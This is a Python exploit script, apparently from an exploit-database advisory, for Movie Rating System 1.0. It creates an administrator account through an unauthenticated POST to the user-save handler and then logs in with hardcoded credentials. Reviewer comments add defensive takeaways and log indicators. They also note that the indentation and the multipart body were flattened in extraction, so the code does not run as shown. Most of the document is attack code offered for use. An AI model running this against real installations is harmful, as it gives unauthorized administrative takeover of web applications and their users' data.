# Exploit Title: Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)
# Date: 22/12/2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Windows

import requests
import json

# Ask the operator for the base URL of the application under test and
# normalise it so the later path concatenation works: a missing scheme
# defaults to plain "http://", and a trailing "/" is appended when absent.
# NOTE(review): leading indentation was lost when this listing was extracted;
# each assignment below presumably forms the body of the `if` directly above it.
url = input('Url:')
if not url.startswith('http://') and not url.startswith('https://'):
url = "http://" + url
if not url.endswith('/'):
url = url + "/"

# Fixed credentials submitted as the new account's username and password.
# Because they are constants, they double as indicators when reviewing the
# application's user table or captured requests for traces of this script.
Username = "tago"
Password = "tagoletta"

# The application's user-save handler, addressed with ?f=save.
reqUrl = url + "classes/Users.php?f=save"

# Browser-like headers. No Cookie or Authorization header is set, so the
# request carries no session: this is the "Unauthenticated" part of the
# advisory title. A handler that acts on such a request is the access-control
# failure the title names.
reqHeaders = {
"Accept": "*/*",
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryTagmac",
"X-Requested-With": "XMLHttpRequest",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
"Origin": url}

# Multipart form body describing the user record: id (empty), firstname,
# lastname, username, password, type and an empty img upload part.
# The `type` field is sent as 1; given the advisory title this presumably
# selects the administrator role. TODO confirm against the application's schema.
# Defensive takeaway: the save handler should require an authenticated
# administrator session and must not take the role value from client-supplied
# form data. The custom boundary string is distinctive enough to match on in
# request-body inspection.
# NOTE(review): this literal was flattened onto one line during extraction and
# does not parse as shown; it is left as found.
reqData = "------WebKitFormBoundaryTagmac Content-Disposition: form-data; name="id" ------WebKitFormBoundaryTagmac Content-Disposition: form-data; name="firstname" Tago ------WebKitFormBoundaryTagmac Content-Disposition: form-data; name="lastname" Letta ------WebKitFormBoundaryTagmac Content-Disposition: form-data; name="username" "+Username+" ------WebKitFormBoundaryTagmac Content-Disposition: form-data; name="password" "+Password+" ------WebKitFormBoundaryTagmac Content-Disposition: form-data; name="type" 1 ------WebKitFormBoundaryTagmac Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryTagmac-- "

# A single POST with no login step before it. A session-less POST to
# classes/Users.php?f=save is what a defender would look for in web server logs.
resp = requests.post(reqUrl, headers=reqHeaders, data=reqData)

# Success of the save request is inferred from the HTTP status alone. The
# response body is not inspected, so any 200 reply (including an
# application-level error delivered with status 200) is reported as a created
# account.
# NOTE(review): indentation was lost in extraction; the lines down to the
# inner if/else presumably all belong to this branch, and the final `else`
# pairs with this `if`.
if resp.status_code == 200:
print("Admin account created")
# Second stage: check the same credentials against the login handler.
reqUrl = url + "classes/Login.php?f=login"

# Form-encoded request this time; again no session cookie is supplied.
reqHeaders = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
"Origin": url
}

# Passing a dict as `data` lets requests form-encode the two fields.
reqData = {"username": ""+Username+"", "password": ""+Password+""}

resp = requests.post(reqUrl, headers=reqHeaders, data=reqData)

# The login reply is parsed as JSON. A non-JSON body raises from json.loads
# and a reply without a "status" key raises KeyError; neither is caught here.
data = json.loads(resp.text)
status = data["status"]

# "success" means the account written by the session-less save request can
# sign in. For responders, this is the condition to rule out by reviewing the
# user table for privileged accounts that no administrator provisioned.
if status == "success":
print("Login Successfully Username:"+ Username+" Password:"+Password)
else:
print("Exploited but not loginned")
else:
# Any non-200 status from the save request ends the run with this message.
print("Not injectable")